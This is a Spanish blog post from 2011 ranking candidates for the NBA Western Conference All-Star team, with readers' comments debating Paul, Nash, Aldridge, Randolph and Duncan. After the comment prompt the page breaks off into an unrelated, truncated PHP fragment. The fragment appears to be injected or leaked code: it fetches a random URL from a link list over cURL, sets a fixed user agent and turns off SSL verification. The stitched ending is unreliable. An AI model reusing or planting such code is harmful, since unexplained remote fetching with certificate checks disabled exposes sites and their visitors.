Los All-Stars de TJNBA: Conferencia Oeste

19 de January de 2011 por Viva_Dirk

Se acerca el momento de una de las fechas más señaladas de la temporada. El All-Star es un punto en el que fijarse, tanto por el espectáculo (no sólo deportivo), como por ser normalmente un punto de inflexión para muchos de los equipos que se preparan para asaltar el título y, desde luego, para ver qué jugadores han alcanzado este estatus durante la presente temporada.

Ahora mismo el quinteto de la conferencia Oeste estaría formado por Paul-Bryant-Anthony-Durant-Yao/Bynum, con la incertidumbre de qué hará David Stern para cubrir la baja de Yao. Pero nosotros vamos a presentaros a nuestros 12 candidatos por conferencia. En realidad, más que “los nuestros” son los míos. Por méritos, no por popularidad.

QUINTETO INICIAL

Chris Paul: El “pequeñín” tiene a sus Hornets colocados en una cómoda sexta posición. No conozco a nadie que apostara por ellos pero ahí están, en gran medida gracias a su líder. Con 16.2 puntos, 4.1 rebotes, 9.6 asistencias, 2.7 robos, 48.4% en tiros de campo, 45.2% en tiros de 3 y un 90% en tiros libres tiene a todos sus compañeros servidos, a sus defensores muy preocupados y a sus defendidos martirizados.

Kobe Bryant: A sus 32 años ya no podemos esperar de él lo que nos dio tiempo atrás, pero a pesar de todas las críticas, los Lakers están segundos del Oeste, una posición que difícilmente verán amenazada y que deberán trabajar mucho para mejorar. Kobe sigue siendo el jugador más letal en los momentos clave y no tenemos ninguna duda de que su rendimiento irá hacia arriba. Está clavado en los 25-5-5 que promedia en su carrera, una muestra de que la clase pesa más que la edad.

Kevin Durant: No puede faltar el máximo anotador de la competición. Sus 28.4 puntos los ve de lejos el resto. Ha metido definitivamente a los Thunder en la élite, con la ayuda de Westbrook, y pelearán hasta el último momento por el factor cancha para Playoffs. Con 6.2 rebotes sigue siendo una gran ayuda bajo los aros para el débil juego interior del que disponen los Thunder, pero echamos en falta un mayor número de asistencias.

Kevin Love: Con 21.2 puntos, 15.7 rebotes y un 44.4% en triples estamos hablando muy probablemente del MVP estadístico de la temporada. Las actuaciones de este joven son algo nunca visto en la historia de la liga y él lo hace casi cada día, eso sí, dentro de un equipo que peleará por los primeros puestos del draft.

Pau Gasol: Fue sin duda el mejor jugador el primer cuarto de la temporada y mantiene junto a Bryant segundos a unos erráticos Lakers. Estamos ante el Pau más completo de su carrera. Muestra de ello son sus 18.5 puntos, 10.7 rebotes, 4 asistencias y 2 tapones con un 51% en tiros.

SUPLENTES

Russell Westbrook: Está siendo casi tan importante como el propio Durant para los Thunder. Sus números (22.4 puntos, 5 rebotes y 8.4 asistencias) están a la altura de los titulares del evento, pero encontramos su punto débil en las casi 4 pérdidas de balón que promedia, algo a remediar para un base.

Blake Griffin: Poco queda que decir. Desde Tim Duncan ningún rookie se acerca a los números de este fenómeno, y no solo de estadísticas va la cosa. La plasticidad de su juego invita a llenar el Staples y a ponerse delante de la pantalla. 22.5 puntos, 12.8 rebotes, 3.4 asistencias y un 52.5% en tiros. La bestia sólo debe mejorar sus tiros libres.

Deron Williams: Como siempre tiene a sus Jazz peleando por tener el factor cancha a favor,  un valor seguro en cuanto a competitividad. Como Griffin, más allá de sus números y se trata de uno de nuestros favoritos, un jugón en estado puro. Sus 22 puntos y 9.3 asistencias le muestran como el mejor base ofensivamente hablando de la liga, y hay mucho nivel actualmente ahí.

LaMarcus Aldridge: El gran olvidado de esta campaña. Con la explosión de Love y la aparición de Griffin pocos están haciendo caso a este estilista de la zona que promedia los máximos de su carrera en anotación y rebote, manteniendo a flote a unos Blazers lastrados por la lesión de Roy. Con 21 puntos y 8.8 rebotes se ha echado el equipo a la espalda.

Manu Ginobili: El máximo anotador del líder de la NBA. Sus 19 puntos, 4 rebotes, 4.7 asistencias y 1.8 robos por noche nos muestran unas capacidades que siempre han estado por encima de sus estadísticas. Es además un jugador decisivo donde los haya, sea en ataque o en defensa.

Dirk Nowitzki: Los Mavs han notado su ausencia y no es para menos. El alemán sigue siendo uno de los grandes anotadores de la competición y da muestras de una cabeza privilegiada para responder al paso de los años. Está exhibiendo el mejor porcentaje de tiro de su carrera con un tremendo 54.3% y un gran 41% desde la línea de 3. Con 23.8 puntos y 7.3 rebotes se mantiene en la élite individual y tiene como siempre a Dallas luchando por las primeras posiciones del Oeste.

Tim Duncan: El alma de los Spurs consigue en menos de 30 minutos sumar mucho para su equipo. Totalmente alejado de la idea de estrella, se centra más que nunca en sumar victorias. Buena muestra de ello es que promedia unos pobres 13.7 puntos, pero no baja ni un ápice en el apartado reboteador (9.5 capturas), pasador (3 asistencias), ni intimidador (2 tapones). Además ha subido su porcentaje en tiros libres y bajado su número de pérdidas. ¡¡GENIO!!

Comenta

18 comentarios a esta entrada

  1. Txusma dice:
    #1

    Mucho ala-pívot y poco alero pero tampoco hay mucho más en el Oeste. Tras Durant deberíamos hablar de Carmelo, Gay o, porque no, Lamar Odom.
    En todo caso, me gustaría destacar a otro gran olvidado como es Zach Randolph. Promedia 20 puntos y 13 rebotes con una eficiencia superior a la de Lamarcus Aldridge o Tim Duncan, por poner 2 jugadores de su posición. El record de Memphis no es mucho peor que el de Portland y en cambio supera al de los Wolves o los Clippers así que creo que Zach debería ser considerado. Por mi iría en el sitio de Lamarcus pq entiendo que Duncan es todavía intocable.

      Citar

  2. Viva_Dirk dice:
    #2

    Pero LaMarcus esta manteniendo a Portland en posiciones de play-offs con mucho menos de lo que tiene Zach al lado, ahí es donde le gana la partida. Y por números tanto Love como Griffin son mejores.

      Citar

  3. sergio dice:
    #3

    Carmelo, Millsap, Nash (la mejor temporada individual en tres años… y con los actuales Suns) , Randolph, Parker, Gordon y Ellis serian los damnificados. Chirrian los casos de Randolph y Nash especialmente, pero puede ser una lista correcta. Como dice Txus… quizas sobre Aldridge. Eso si… esperemos que se basen en el record de los equipos mas que en las estadisticas individuales.

      Citar

  4. Sancho88 dice:
    #4

    El esfuerzo de Aldridge, para mí, tiene más mérito que el de Randolph. Lo digo porque Lamarcus intenta año a año mejorar su tiro exterior (a 4-5 metros), y desahoga mucho al equipo desde ahí. Para mí, creo que junto a Roy, es la referencia del equipo, el jugador al que Andre puede pasarle el balón en cualquier circunstancia. Para mí, se mueve mejor que Randolph y te permite hacer sistemas ofensivos más dinámicos. No hay duda del mérito estadístico de Randolph, pues es un tío que se faja enormemente en la pintura y tiene una potencia imparable, pero yo pienso que de manera más global, Aldridge permite un mejor juego en equipo, y ya sabemos que Memphis es el reino del individualismo. Si hay que valorar baloncesto, yo me quedo con Aldridge, sin duda.

      Citar

  5. Viva_Dirk dice:
    #5

    Nash y Parker han sido los grandes damnificados, ya iban tres bases y los Suns estan demasiado abajo como para que Nash le quite el puesto a Aldridge, que ya digo que para mi se infravalora su temporada. Y casi todos los PF que puesto pueden cubrir el puesto de center.

      Citar

  6. TX dice:
    #6

    Yo quitarí a Paul del quinteto inicial y del equipo. Para mi es de los bases más sobrevalorados de la liga. Pondría de titular a Williams y de suplente a Nash: Phoenix no va muy bien que se diga pero solo hay que ver sus partidos y cómo Nash reparte juego y crea ataque con tantos jugadores mediocres que tiene en su equipo. Y al final eso es lo que quieres de un base: que saque lo mejor de sus compañeros

      Citar

  7. Viva_Dirk dice:
    #7

    Hombre TX, cada uno tiene su opinión y no es descabellado pensar en poner a Deron en lugar de Paul, pero los argumentos que das para poner a Nash en lugar de a Paul son sinonimo de:

    – No haber visto ningun partido de los Hornets este año.
    – Simplemente tenerle manía.

    Vamos que Paul tiene a a los Hornets cerquísima del factor cancha de play-offs y nadie daba un duro por ellos.

      Citar

  8. Sancho88 dice:
    #8

    Los números, los números… dichosos números. El basket es más que números. Marbury metió en su carrera de media 5 puntos más que Stockton por temporada, y quien le va a recordar en un top ten de mejores bases históricos? nadie. Y, sin embargo, a Stockton todo el mundo le pone como primer o segundo mejor base de la historia de la liga, en comparación con Magic.

    Yo creo que Nash es el tercer mejor base del Oeste, pero ya está. Ahora mismo, Chris Paul está muy por encima de Nash, en capacidad física, en esfuerzo defensivo y en efectividad (+24 Chris Paul, +22 Nash). Vale que el genio de Nash es indiscutible, la experiencia acumulada y todo eso, pero seguramente, si preguntaras a la mayoría de jugadores de la NBA quien es mejor base ahora mismo, te dirían que Paul. Es el tío que guió en las olimpiadas de Pekin a los Estados Unidos; era titular por delante de Williams y Kidd. Nash ya tuvo sus premios hace algunos años, y si en Phoenix hay paquetes, que me dices de los de New Orleans? Pues si, son iwal de “paquetes”, pero ahi están, con el trabajo de Monty Williams desde el banquillo son la mejor defensa de la liga, y para defender la clave es tu base (no me extrañaría nada que Paul apareciera entre los mejores jugadores defensivos).

    Así que sobrevalorado no creo que esté. Pero si reducimos el baloncesto a los números solamente como tu dices, ahí Paul tiene mejores porcentajes que Nash, 45% en triples por 39% del canadiense, y 49% en tiros por 52% de Nash (ahí lo supera). En tiros libres ambos promedian 90%. Y Nash da una asistencia más por partido pero Paul coge casi dos rebotes más que Nash.

    Por tanto, donde esta la sobrevaloracion?

      Citar

  9. sergio dice:
    #9

    Paul gana este año a Nash estadísticamente, en record de equipo, en defensa, en posición del equipo respecto a su prevision inicial,…. Yo dije que Nash merecia estar porque hay jugadores que se quedaran fuera y por Nash hasta ampliaba el cupo de jugadores. Supongo que es cosa de gustos… pero el mejor base de la NBA es Paul. Le hemos dado muchos palos a los Hornets ultimamente y llevan un 8-2 en los ultimos 10 partidos. No hay ningun equipo con mejor marca que esa en los ultimos 10 encuentros.

      Citar

  10. Jona dice:
    #10

    Ellis es el segundo mejor escolta del Oeste y por numeros pelea con bryant ,12 partidos con mas de 30 puntos y 3 por encima de 40 , ahora direis que si juega para si mismo bla bla bla que se lo digan ayer a Indiana a uss 26pp con solo 6 TL por partido su mejora en los triples o a sus 6 asistencias para mi un fijo.
    Oklahoma tiene suficiente con Durant.

    y si , sigo a los Warriors.

      Citar

  11. Viva_Dirk dice:
    #11

    Pues si sigues a los Warriors no hace falta que te diga su número de derrotas, la temporada de Westbrook es mucho mas completa que la suya.

      Citar

  12. Jona dice:
    #12

    Sin Lee , y sin Curry en por lo menos 20 de los 40 partidos uno de los dos no ha estado, y mucho más completa lo dudo de un jugador que no tiene tiro exterior y anota a base de tiros libres

      Citar

  13. TheDeerHunter dice:
    #13

    Wow… Daimiel rompe bastante con nuestros pronósticos.

    Se carga a Deron y mete a Parker (aunque con la última trayectoria de los Jazz igual tiene más sentido), se carga a Aldridge y (nada menos) a Duncan incluyendo a Melo y a Zach Randolph.

    Supongo que podría entender incluir a Melo y Randolph… pero no a costa de quitar a Aldridge ni a Duncan (ni aunque lo de este último fuera sólo por su trayectoria, que no es así para nada)

      Citar

  14. sergio dice:
    #14

    Es que Melo va a entrar por votos…. Lo que me chirria es lo de Duncan por Z Bo aunque tampoco es que sea una barbaridad lo que esta diciendo no??

      Citar

  15. Txusma dice:
    #15

    Por números, Zach podría estar por encima de Duncan…

      Citar

  16. TheDeerHunter dice:
    #16

    Zach es un hacenúmeros de tres pares. Todo lo contrario que Duncan.
    Se sale por todos lados, pero sus equipos ni lo notan… entre otras cosas por una capacidad colectiva de la que carece. Todo lo contrario que Duncan.

    Duncan está haciendo mucho mejor temporada de lo que se dice. Pero aún tiene un punto extra de generosidad para hacerse a un lado y que otros lleven las riendas. La guinda a una carrera de ídolo para si mismo y para sus compañeros. Todo lo contrario que Zach.

    Desconozco si será la última vez que vaya al all-star, que no tiene mayor importancia. Pero el día que Zach le quite el puesto a Duncan en ningún sitio será un día muy triste el baloncesto.

    Estoy seguro que no va a ser así y Duncan va a ir donde los mejores, que es donde le corresponde por derecho.

      Citar

  17. Txusma dice:
    #17

    Ei! Q yo soy un pro-Duncan de arriba-abajo y estoy totalmente de acuerdo con lo que comentas. La temporada de Duncan de este año todavía es AllStars pero si el año que viene se aparta un poco más y sus números bajan otro poco ya me costará más verlo en el All Stars en lugar de Griffin o Love, por ejemplo. Todo tiene un principio y un final.

      Citar

  18. sergio dice:
    #18

    El no aparecer en el All-Star tampoco es el final de nada. El ha escrito su historia en partidos importantes… y confio en que siga haciendolo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>